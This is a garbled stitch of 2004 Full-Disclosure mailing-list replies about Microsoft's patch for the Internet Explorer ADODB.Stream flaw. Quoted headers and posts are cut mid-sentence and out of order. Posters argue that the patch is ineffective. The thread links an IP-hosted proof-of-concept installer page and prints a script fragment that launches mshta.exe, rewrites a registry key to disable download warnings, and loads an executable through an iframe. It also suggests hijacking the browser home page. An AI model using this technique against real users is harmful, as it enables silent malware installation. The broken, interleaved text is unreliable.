Matthew Murphy wrote:
snip
Well, the problem with ADODB.Stream wasn't executing files, it was writing
them to disk. ...
Exactly.
ADODB.Stream is just doing what it is supposed to. The problem is
that code loaded from the Internet zone is just not supposed to be
allowed to get access to
[mailto:[EMAIL PROTECTED] On Behalf Of Helmut Hauser
Sent: vrijdag 2 juli 2004 18:39
To: [EMAIL PROTECTED]
Subject: [Full-Disclosure] Fix for IE ADODB.Stream vulnerability is out
http://www.microsoft.com/downloads/details.aspx?displaylang=enFamilyID=4d056748-c538-46f6-b7c8-2fbfd0d237e3
Better late than never ...
Helmut Hauser
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
:[EMAIL PROTECTED] On Behalf Of William Warren
Sent: vrijdag 2 juli 2004 20:47
To: Jelmer
Cc: 'Helmut Hauser'; [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] Fix for IE ADODB.Stream vulnerability is out
this returns an error..is that all it is supposed to do?
Jelmer wrote:
Too bad it won't do you one ounce any good
http://62.131.86.111/security/idiots/malware2k/installer.htm
Credit: http-equiv
Jelmer writes:
Because we avoid the adodb.stream issue all together,
You can patch it, but if you leave open other issues, well it's pointless
Instead we just swap in this instead of the old shellcode:
[snip PoC]
Well, the problem with ADODB.Stream wasn't executing files, it was writing
them
The real fault doesn't belong with individual components
(ADODB.Stream included), and I think the almost rant-like posts
of Drew Copley and HTTP-EQUIV miss this fact. ADODB.Stream
does *not* represent a vulnerability, although it does act to
significantly worsen the impact of an
!--
ActiveXObject(Shell.Application);
obj.ShellExecut(mshta.exe,about:scriptvar wsh=new
ActiveXObject('WScript.Shell');wsh.RegWrite
('HKCR\exefile\EditFlags', 0x3807, REG_BINARY);)
/scriptiframe src=foo.exe);
--
On quick reflection, I completely missed Matthew's point. It's
still have to contend with mshta.exe calling out through the
iframe and more than likely firewalled long ago, so use it to
write the registry to kill the download warning, then use it set
the browser home page as http://www/foo.exe, that or the
default search engine.
tons of